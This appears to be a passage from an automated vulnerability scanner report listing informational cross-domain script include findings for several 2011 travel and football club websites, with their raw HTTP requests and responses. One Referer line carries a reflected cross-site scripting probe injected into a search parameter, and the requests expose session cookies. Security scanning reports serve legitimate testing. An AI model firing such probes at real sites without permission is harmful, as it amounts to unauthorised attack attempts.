X-Strangeloop: ViewState,Compression
Content-Length: 78193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1671993858634531840221815835&adsize=728x90&pagepos=1&random=634531840221659588?" type="text/javascript"></script>
...[SNIP]...
<header>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.76. http://www.igougo.com/xd_receiver.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /xd_receiver.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xd_receiver.aspx HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/extern/login_status.php?api_key=5aaf37e32a30d8d582e69f8ddbfea86b&extern=0&channel=http%3A%2F%2Fwww.igougo.com%2Fxd_receiver.aspx&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-5; mbox=PC#1317601622475-177474.19#1318816337|check#true#1317606797|session#1317606736569-208906#1317608597; SL_UVId=2BC47F12FA5D4186; __utma=179047228.1875149061.1317601642.1317603064.1317606790.2; __utmb=179047228.1.10.1317606790; __utmc=179047228; __utmz=179047228.1317606790.2.2.utmcsr=igougo.com|utmccn=(referral)|utmcmd=referral|utmcct=/traveldeals/ratefinder.aspx

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 01:53:26 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Strangeloop: ViewState,Compression
Content-Length: 374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" ><body><script type="text/javascript
...[SNIP]...
</script><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

20.77. http://www.manutd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 26620
Cache-Control: public, max-age=153
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...

20.78. http://www.manutd.com/One-United/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...

20.79. http://www.manutd.com/Search-Results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 18228
Cache-Control: public, max-age=511
Date: Sun, 02 Oct 2011 23:55:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...

20.80. http://www.manutd.com/Splash-Page.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Splash-Page.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Splash-Page.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 15275
Cache-Control: public, max-age=363
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--<meta http-equiv="REFRESH" content="0; url=http://www.manutd.com/defaul
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

20.81. http://www.manutd.com/en.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.1.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 26620
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:49:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...

20.82. http://www.manutd.com/en/Club/Sponsors.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Club/Sponsors.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Club/Sponsors.aspx?sponsorid={F745DA14-CB5E-4A81-816A-8DB410E47A75} HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/COM_Sponsor_Footer_4.swf?targetTAG=_blank&clickTarget=_blank&pathTAG=http%3A//aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/&closeTAG=javascript%3AcloseAdLayer2046906%28%29&openTAG=javascript%3AopenAdLayer2046906%28%29&expandTAG=javascript%3Aexpand2046906%28%29&collapseTAG=javascript%3Acollapse2046906%28%29&clicktarget=_blank&clickTarget=_blank&clickTARGET=_blank&CURRENTDOMAIN=www.manutd.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.6.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 21722
Cache-Control: public, max-age=537
Date: Sun, 02 Oct 2011 23:59:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...

20.83. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Fanzone/Competition-And-Polls.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/Fanzone/Competition-And-Polls.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.7.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 19323
Cache-Control: public, max-age=1
Date: Mon, 03 Oct 2011 00:00:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...

20.84. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.2.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 28270
Cache-Control: public, max-age=553
Date: Sun, 02 Oct 2011 23:50:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...

20.85. http://www.manutd.com/en/One-United.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/One-United.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/One-United.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.3.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 23135
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:54:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...

20.86. http://www.orbitz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:06:46 GMT
Content-Length: 174769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<div class="ad" id="ad468x60_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600407125&dsrc=7&height=60&width=468&adType=noframe&"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad336x600">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600407125&dsrc=7&height=600&width=336&adType=noframe&pos=external&"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600407125&dsrc=7&height=225&rotator=true&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=150&width=519&adType=noframe&"></script>
...[SNIP]...
<li>
                    <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600407125&dsrc=7&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=55&width=120&"></script>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script>
...[SNIP]...

20.87. http://www.orbitz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
